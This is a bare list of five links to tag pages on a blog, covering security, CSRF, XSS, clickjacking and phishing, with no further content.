    • http://simonwillison.net/tags/security/
    • http://simonwillison.net/tags/csrf/
    • http://simonwillison.net/tags/xss/
    • http://simonwillison.net/tags/clickjacking/
    • http://simonwillison.net/tags/phishing/